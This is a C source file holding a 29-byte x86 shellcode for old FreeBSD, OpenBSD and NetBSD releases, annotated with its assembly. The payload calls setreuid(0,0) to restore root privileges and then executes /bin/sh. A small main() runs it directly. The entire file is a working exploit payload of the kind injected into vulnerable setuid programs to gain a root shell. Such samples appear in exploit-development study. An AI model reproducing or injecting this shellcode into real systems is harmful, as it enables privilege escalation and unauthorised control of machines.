/* 29 bytes setreuid(0,0) execve /bin/sh shellcode - BSD-x86
 * - by bighawk (bighawk@warfare.com)
 *
 * Tested on: FreeBSD-4.3, OpenBSD-2.9, NetBSD-1.5
 *
 */


char code[] =

   "\x31\xc0"			// xor	eax, eax
   "\x50"			// push	eax
   "\x50"			// push	eax
   "\x50"			// push	eax
   "\xb0\xca"			// mov	al, 202
   "\xcd\x80"			// int	80h
   "\x68\x2f\x2f\x73\x68"	// push    dword 68732f2fh
   "\x68\x2f\x62\x69\x6e"	// push    dword 6e69622fh
   "\x89\xe3"			// mov     ebx, esp
   "\x50"			// push    eax
   "\x54"			// push    esp
   "\x53"			// push    ebx
   "\x53"			// push    ebx
   "\xb0\x3b"			// mov     al, 59
   "\xcd\x80";			// int     80h


main() {
  void (*a)() = (void *)code;
  printf("size: %d bytes\n", strlen(code));
  a();
}